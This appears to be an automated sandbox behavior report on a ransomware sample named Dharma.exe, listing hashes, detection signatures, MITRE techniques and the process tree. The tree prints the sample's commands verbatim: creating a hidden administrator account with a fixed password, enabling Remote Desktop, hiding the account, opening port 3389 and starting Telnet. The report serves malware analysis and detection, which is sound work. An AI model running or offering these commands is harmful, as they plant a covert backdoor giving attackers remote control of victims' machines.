Overview
overview
10Static
static
7Ransomware...er.exe
windows7-x64
8Ransomware...er.exe
windows10-2004-x64
8Ransomware/7ev3n.exe
windows7-x64
Ransomware/7ev3n.exe
windows10-2004-x64
Ransomware...le.exe
windows7-x64
Ransomware...le.exe
windows10-2004-x64
Ransomware...it.exe
windows7-x64
10Ransomware...it.exe
windows10-2004-x64
10Ransomware/Birele.exe
windows10-2004-x64
10Ransomware...r5.exe
windows7-x64
10Ransomware...r5.exe
windows10-2004-x64
10Ransomware...us.exe
windows7-x64
10Ransomware...us.exe
windows10-2004-x64
10Ransomware...er.exe
windows7-x64
10Ransomware...er.exe
windows10-2004-x64
10Ransomware...ll.exe
windows7-x64
9Ransomware...ll.exe
windows10-2004-x64
7Ransomware...ck.exe
windows7-x64
7Ransomware...ck.exe
windows10-2004-x64
7Ransomware/Dharma.exe
windows7-x64
9Ransomware/Dharma.exe
windows10-2004-x64
9Ransomware/Fantom.exe
windows7-x64
10Ransomware/Fantom.exe
windows10-2004-x64
10Ransomware...ab.exe
windows7-x64
10Ransomware...ab.exe
windows10-2004-x64
10Ransomware...ye.exe
windows7-x64
10Ransomware...ye.exe
windows10-2004-x64
10Ransomware...Eye.js
windows7-x64
10Ransomware...Eye.js
windows10-2004-x64
10Ransomware...pt.exe
windows7-x64
10Ransomware...pt.exe
windows10-2004-x64
10Ransomware...en.exe
windows7-x64
8Analysis
-
max time kernel
150s -
max time network
162s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
03-03-2024 01:34
Behavioral task
behavioral1
Sample
Ransomware/$uckyLocker.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Ransomware/$uckyLocker.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
Ransomware/7ev3n.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
Ransomware/7ev3n.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
Ransomware/Annabelle.exe
Resource
win7-20240220-en
Behavioral task
behavioral6
Sample
Ransomware/Annabelle.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
Ransomware/BadRabbit.exe
Resource
win7-20240215-en
Behavioral task
behavioral8
Sample
Ransomware/BadRabbit.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
Ransomware/Birele.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral10
Sample
Ransomware/Cerber5.exe
Resource
win7-20240221-en
Behavioral task
behavioral11
Sample
Ransomware/Cerber5.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral12
Sample
Ransomware/CoronaVirus.exe
Resource
win7-20240221-en
Behavioral task
behavioral13
Sample
Ransomware/CoronaVirus.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral14
Sample
Ransomware/CryptoLocker.exe
Resource
win7-20240221-en
Behavioral task
behavioral15
Sample
Ransomware/CryptoLocker.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral16
Sample
Ransomware/CryptoWall.exe
Resource
win7-20240220-en
Behavioral task
behavioral17
Sample
Ransomware/CryptoWall.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral18
Sample
Ransomware/DeriaLock.exe
Resource
win7-20240215-en
Behavioral task
behavioral19
Sample
Ransomware/DeriaLock.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral20
Sample
Ransomware/Dharma.exe
Resource
win7-20240221-en
Behavioral task
behavioral21
Sample
Ransomware/Dharma.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral22
Sample
Ransomware/Fantom.exe
Resource
win7-20240221-en
Behavioral task
behavioral23
Sample
Ransomware/Fantom.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral24
Sample
Ransomware/GandCrab.exe
Resource
win7-20240215-en
Behavioral task
behavioral25
Sample
Ransomware/GandCrab.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral26
Sample
Ransomware/GoldenEye/GoldenEye.exe
Resource
win7-20240221-en
Behavioral task
behavioral27
Sample
Ransomware/GoldenEye/GoldenEye.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral28
Sample
Ransomware/GoldenEye/GoldenEye.js
Resource
win7-20240221-en
Behavioral task
behavioral29
Sample
Ransomware/GoldenEye/GoldenEye.js
Resource
win10v2004-20240226-en
Behavioral task
behavioral30
Sample
Ransomware/InfinityCrypt.exe
Resource
win7-20240221-en
Behavioral task
behavioral31
Sample
Ransomware/InfinityCrypt.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral32
Sample
Ransomware/Krotten.exe
Resource
win7-20240221-en
General
-
Target
Ransomware/Dharma.exe
-
Size
11.5MB
-
MD5
928e37519022745490d1af1ce6f336f7
-
SHA1
b7840242393013f2c4c136ac7407e332be075702
-
SHA256
6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850
-
SHA512
8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c
-
SSDEEP
196608:JZnMy97vfgla5NX7YaP6uIEJsp+jb4agYSUpHm6g90MrYmhZZoG0tLzr1+W:LnMy9rfma5NrYaVzC0b4vpZZoG0tR+W
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 1280 netsh.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 760 attrib.exe -
Sets service image path in registry 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avlwumkczaykdcsqq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\avlwumkczaykdcsqq.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wwvepuhpkeefrznwe\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\wwvepuhpkeefrznwe.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\tlibkondxlhtop\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\tlibkondxlhtop.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zynfurrumnoukfze\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\zynfurrumnoukfze.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\kbnzumuvlmtwwegy\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\kbnzumuvlmtwwegy.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ixqbnnowognzhjlht\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\ixqbnnowognzhjlht.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ffqofwaowdrcbkq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\ffqofwaowdrcbkq.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mssqlaq.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mssql.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lziubkqbxpxgapfh\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\lziubkqbxpxgapfh.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zovrwlwpkpzuxyir\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\zovrwlwpkpzuxyir.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\jefylodblrmhnn\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\jefylodblrmhnn.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\cqfscigclyjjiec\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\cqfscigclyjjiec.sys" mssql.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Dharma.exe -
Executes dropped EXE 4 IoCs
pid Process 4244 nc123.exe 3356 mssql.exe 4676 mssql2.exe 2272 SearchHost.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: SearchHost.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4320 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: LoadsDriver 32 IoCs
pid Process 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe 3356 mssql.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeLoadDriverPrivilege 3356 mssql.exe Token: SeDebugPrivilege 4676 mssql2.exe Token: SeIncreaseQuotaPrivilege 552 WMIC.exe Token: SeSecurityPrivilege 552 WMIC.exe Token: SeTakeOwnershipPrivilege 552 WMIC.exe Token: SeLoadDriverPrivilege 552 WMIC.exe Token: SeSystemProfilePrivilege 552 WMIC.exe Token: SeSystemtimePrivilege 552 WMIC.exe Token: SeProfSingleProcessPrivilege 552 WMIC.exe Token: SeIncBasePriorityPrivilege 552 WMIC.exe Token: SeCreatePagefilePrivilege 552 WMIC.exe Token: SeBackupPrivilege 552 WMIC.exe Token: SeRestorePrivilege 552 WMIC.exe Token: SeShutdownPrivilege 552 WMIC.exe Token: SeDebugPrivilege 552 WMIC.exe Token: SeSystemEnvironmentPrivilege 552 WMIC.exe Token: SeRemoteShutdownPrivilege 552 WMIC.exe Token: SeUndockPrivilege 552 WMIC.exe Token: SeManageVolumePrivilege 552 WMIC.exe Token: 33 552 WMIC.exe Token: 34 552 WMIC.exe Token: 35 552 WMIC.exe Token: 36 552 WMIC.exe Token: SeIncreaseQuotaPrivilege 552 WMIC.exe Token: SeSecurityPrivilege 552 WMIC.exe Token: SeTakeOwnershipPrivilege 552 WMIC.exe Token: SeLoadDriverPrivilege 552 WMIC.exe Token: SeSystemProfilePrivilege 552 WMIC.exe Token: SeSystemtimePrivilege 552 WMIC.exe Token: SeProfSingleProcessPrivilege 552 WMIC.exe Token: SeIncBasePriorityPrivilege 552 WMIC.exe Token: SeCreatePagefilePrivilege 552 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2272 SearchHost.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 2272 SearchHost.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 3356 mssql.exe 3356 mssql.exe 4676 mssql2.exe 2272 SearchHost.exe 4676 mssql2.exe 3356 mssql.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 828 wrote to memory of 4244 828 Dharma.exe 97 PID 828 wrote to memory of 4244 828 Dharma.exe 97 PID 828 wrote to memory of 4244 828 Dharma.exe 97 PID 828 wrote to memory of 3356 828 Dharma.exe 100 PID 828 wrote to memory of 3356 828 Dharma.exe 100 PID 828 wrote to memory of 4676 828 Dharma.exe 101 PID 828 wrote to memory of 4676 828 Dharma.exe 101 PID 828 wrote to memory of 4676 828 Dharma.exe 101 PID 828 wrote to memory of 4320 828 Dharma.exe 102 PID 828 wrote to memory of 4320 828 Dharma.exe 102 PID 828 wrote to memory of 4320 828 Dharma.exe 102 PID 828 wrote to memory of 3436 828 Dharma.exe 103 PID 828 wrote to memory of 3436 828 Dharma.exe 103 PID 828 wrote to memory of 3436 828 Dharma.exe 103 PID 828 wrote to memory of 2272 828 Dharma.exe 106 PID 828 wrote to memory of 2272 828 Dharma.exe 106 PID 828 wrote to memory of 2272 828 Dharma.exe 106 PID 4244 wrote to memory of 2100 4244 nc123.exe 107 PID 4244 wrote to memory of 2100 4244 nc123.exe 107 PID 4244 wrote to memory of 2100 4244 nc123.exe 107 PID 3436 wrote to memory of 3508 3436 cmd.exe 108 PID 3436 wrote to memory of 3508 3436 cmd.exe 108 PID 3436 wrote to memory of 3508 3436 cmd.exe 108 PID 3508 wrote to memory of 552 3508 cmd.exe 109 PID 3508 wrote to memory of 552 3508 cmd.exe 109 PID 3508 wrote to memory of 552 3508 cmd.exe 109 PID 3508 wrote to memory of 4164 3508 cmd.exe 110 PID 3508 wrote to memory of 4164 3508 cmd.exe 110 PID 3508 wrote to memory of 4164 3508 cmd.exe 110 PID 3436 wrote to memory of 1152 3436 cmd.exe 112 PID 3436 wrote to memory of 1152 3436 cmd.exe 112 PID 3436 wrote to memory of 1152 3436 cmd.exe 112 PID 1152 wrote to memory of 4624 1152 net.exe 113 PID 1152 wrote to memory of 4624 1152 net.exe 113 PID 1152 wrote to memory of 4624 1152 net.exe 113 PID 3436 wrote to memory of 2756 3436 cmd.exe 114 PID 3436 wrote to memory of 2756 3436 cmd.exe 114 PID 3436 wrote to memory of 2756 3436 cmd.exe 114 PID 2756 wrote to memory of 3656 2756 net.exe 115 PID 2756 wrote to memory of 3656 2756 net.exe 115 PID 2756 wrote to memory of 3656 2756 net.exe 115 PID 3436 wrote to memory of 1032 3436 cmd.exe 116 PID 3436 wrote to memory of 1032 3436 cmd.exe 116 PID 3436 wrote to memory of 1032 3436 cmd.exe 116 PID 1032 wrote to memory of 3120 1032 cmd.exe 117 PID 1032 wrote to memory of 3120 1032 cmd.exe 117 PID 1032 wrote to memory of 3120 1032 cmd.exe 117 PID 1032 wrote to memory of 1048 1032 cmd.exe 118 PID 1032 wrote to memory of 1048 1032 cmd.exe 118 PID 1032 wrote to memory of 1048 1032 cmd.exe 118 PID 3436 wrote to memory of 4924 3436 cmd.exe 119 PID 3436 wrote to memory of 4924 3436 cmd.exe 119 PID 3436 wrote to memory of 4924 3436 cmd.exe 119 PID 4924 wrote to memory of 1460 4924 net.exe 120 PID 4924 wrote to memory of 1460 4924 net.exe 120 PID 4924 wrote to memory of 1460 4924 net.exe 120 PID 3436 wrote to memory of 3136 3436 cmd.exe 121 PID 3436 wrote to memory of 3136 3436 cmd.exe 121 PID 3436 wrote to memory of 3136 3436 cmd.exe 121 PID 3136 wrote to memory of 4448 3136 net.exe 122 PID 3136 wrote to memory of 4448 3136 net.exe 122 PID 3136 wrote to memory of 4448 3136 net.exe 122 PID 3436 wrote to memory of 4836 3436 cmd.exe 123 PID 3436 wrote to memory of 4836 3436 cmd.exe 123 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 760 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ransomware\Dharma.exe"C:\Users\Admin\AppData\Local\Temp\Ransomware\Dharma.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:2100
-
-
-
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe"2⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3356
-
-
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\Shadow.bat" "2⤵PID:4320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\systembackup.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="3⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value4⤵
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
C:\Windows\SysWOW64\find.exeFind "="4⤵PID:4164
-
-
-
C:\Windows\SysWOW64\net.exenet user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"3⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"4⤵PID:4624
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators systembackup /add3⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators systembackup /add4⤵PID:3656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="3⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value4⤵PID:3120
-
-
C:\Windows\SysWOW64\find.exeFind "="4⤵PID:1048
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" systembackup /add3⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add4⤵PID:1460
-
-
-
C:\Windows\SysWOW64\net.exenet accounts /forcelogoff:no /maxpwage:unlimited3⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited4⤵PID:4448
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f3⤵PID:4836
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f3⤵PID:112
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f3⤵PID:1220
-
-
C:\Windows\SysWOW64\attrib.exeattrib C:\users\systembackup +r +a +s +h3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:760
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 3389 "Remote Desktop"3⤵
- Modifies Windows Firewall
PID:1280
-
-
C:\Windows\SysWOW64\sc.exesc config tlntsvr start=auto3⤵
- Launches sc.exe
PID:4320
-
-
C:\Windows\SysWOW64\net.exenet start Telnet3⤵PID:1224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Telnet4⤵PID:1168
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3740 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:81⤵PID:400
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD55531bbb8be242dfc9950f2c2c8aa0058
SHA1b08aadba390b98055c947dce8821e9e00b7d01ee
SHA2564f03ab645fe48bf3783eb58568e89b3b3401956dd17cb8049444058dab0634d7
SHA5123ce7e1d7b330cc9d75c3ce6d4531afe6bfa210a0bcbb45d4a7c29aabff79bebf3263fe0b5377956e2f88036b466383f001a7a6713da04a411b1aceb42bc38291
-
Filesize
480KB
MD5b7b2c704cb9a6dab57fd2fdbf4dd31e7
SHA1764b2b044067222d83837a896841cad7cee247de
SHA25637d1efc7a9232d6274121d75c93b20e529ca90c99462ff3466cc2b524be222da
SHA512735206116ba8de55920493c0b9e8fa979e27812822c0ba55a5bce32c20e488627e49973db8c3043c3c97b60ee61ee283980310da7940b00ab21f14c0538678ac
-
Filesize
243KB
MD5501b963083b286b16a003a24f4bd76c5
SHA16e834bdb4c0dcddde1fd1b704a2f54c2ab731d95
SHA256683f9d814604725c4944186b92d1068f90f33335554da26288c4a81bd340b461
SHA5124f29653920eef4e37a5da417ede58cbb245d363070bc8c2ce24415ce1846dda54d5e594385cfec0b626bcd17be89a2061d785fd719c141bfe2f435580fdd181a
-
Filesize
412KB
MD512b7638b2a274ef1ae55dfd4ed6f9354
SHA1f08e98f910bfe9a77ff5e99a0c97b757aee41ed9
SHA2568c741704ebf5fbcbae1552eb1a286694dff555b890ddeedd59e014a5a94d482e
SHA51243e9e148f4f1c5203fb1798c168fabcf212a23f7f5f072e7213d5000af05efc8f50eac6ec4998d35e528dadc2800cc457e2c084cb25b77a208dd1ec5abc9fcbb
-
Filesize
28B
MD5df8394082a4e5b362bdcb17390f6676d
SHA15750248ff490ceec03d17ee9811ac70176f46614
SHA256da3f155cfb98ce0add29a31162d23da7596da44ba2391389517fe1a2790da878
SHA5128ce519dc5c2dd0bbb9f7f48bedf01362c56467800ac0029c8011ee5d9d19e3b3f2eff322e7306acf693e2edb9cf75caaf7b85eb8b2b6c3101ff7e1644950303d
-
Filesize
674KB
MD5b2233d1efb0b7a897ea477a66cd08227
SHA1835a198a11c9d106fc6aabe26b9b3e59f6ec68fd
SHA2565fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da
SHA5126ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37
-
Filesize
128KB
MD5ab10c6bfb35da469a340d08eee76c3cd
SHA108be3cfa8799cbba1edbc107b74f0cf2f724df76
SHA256d6ecb87472936f887517b0f839cba5596bec79a7ada495b665a387ccd1e71eb3
SHA512f87c91347f014253088bfeb95a90162c4e365d0e1e38a54b409822636ac6bad98bf0c14d6de609c4aa177c41d7ca6001443f87c3d3005b26eb8de501b2be672c
-
Filesize
2.8MB
MD56ca66d65f5829dcacf8dfa5f62d7181b
SHA124861e380b5797f9cf5f904ec23a5623a84837ce
SHA25639a396a348fb5a14f40490efa5e777cf5c1a4a8af665585a0e93fd562f81aa99
SHA5126e74d1cdfccca96ea9c5bc082ee42edc710daee6cd13783ed0547a22877f3a3cea913918c359eb99c0cc77da8cafba7e27ea374efe0e26cbf8b6580c0dad75ec
-
Filesize
2.7MB
MD52b71b7bc75c16670caca19b23d7f7c5e
SHA161d2e02713538247a92ec151c5cf091995c9bccb
SHA256066067ce313827160f711dc79cc5214f1dadb851a92970622505ea56ff8568e7
SHA5121c6a8f7f7ce8bef72425ccbc8088ee97f5d17bacb7ba28e376709d56dcc671f3ca489c3b9c2369ffb77a4ab8d58b04af379c564411f146608103ec4e8fd37eaa
-
Filesize
2.0MB
MD5dc7230ddb4dbd7b7a77fe9c57ba185d7
SHA13704416b2d1f885aa559af0dc834b32b8c38bb89
SHA2567372f1a78cbb52efc372761f64d978dc533f034d18eec1ccaf07fcf206df3515
SHA512f5afacc012095a5943aa0618a2f81b7645713bfd47415f8b3e270d161f564eee49b6793dea42dd37507436c5a5864d5d6d0a5bd428bf7292a5c24bd7ff5b7fdc
-
Filesize
1.4MB
MD5b0519497fe8f9dfaceb6ff3c55a2260b
SHA15fed3f2cbb839b92fccc3b0356be3ffd4ee3a754
SHA256faa0954f8a5909d0cc18c94d086b7320897d37ef5ae97072bab6ad702ad846ac
SHA51217eb47a53cdb87a8cbb5108e18a673a1af436b84e03b5c4419172fd4cb184b13895f8c2ffcc921135d57420b71269cec6d6bb9d6ae00b3d6e1e116c6fe8a0d34
-
Filesize
1.2MB
MD5fdba31c6efa076fc6ec5c1fc72eb19fc
SHA1c7c7bb63d95b1241cc2d39955521f070312ef242
SHA256c7c9f2d1991495091a0478961ad85fb97deab24e756009b097bebfb50d183efe
SHA512ad8aa88282fcd03da95ebf969062963619cacec3d7c1f64998894d1bb23cb7fca2046cd74ca9f79391ed9b03f5dda7fdef177ce2c2c9045ec0a068ec7079a9c6
-
Filesize
125KB
MD5597de376b1f80c06d501415dd973dcec
SHA1629c9649ced38fd815124221b80c9d9c59a85e74
SHA256f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446
SHA512072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b
-
Filesize
1KB
MD5b4b2f1a6c7a905781be7d877487fc665
SHA17ee27672d89940e96bcb7616560a4bef8d8af76c
SHA2566246b0045ca11da483e38317421317dc22462a8d81e500dee909a5269c086b5f
SHA512f883cea56a9ac5dcb838802753770494ce7b1de9d7da6a49b878d534810f9c87170f04e0b8b516ae19b9492f40635a72b3e8a4533d39312383c520abe00c5ae6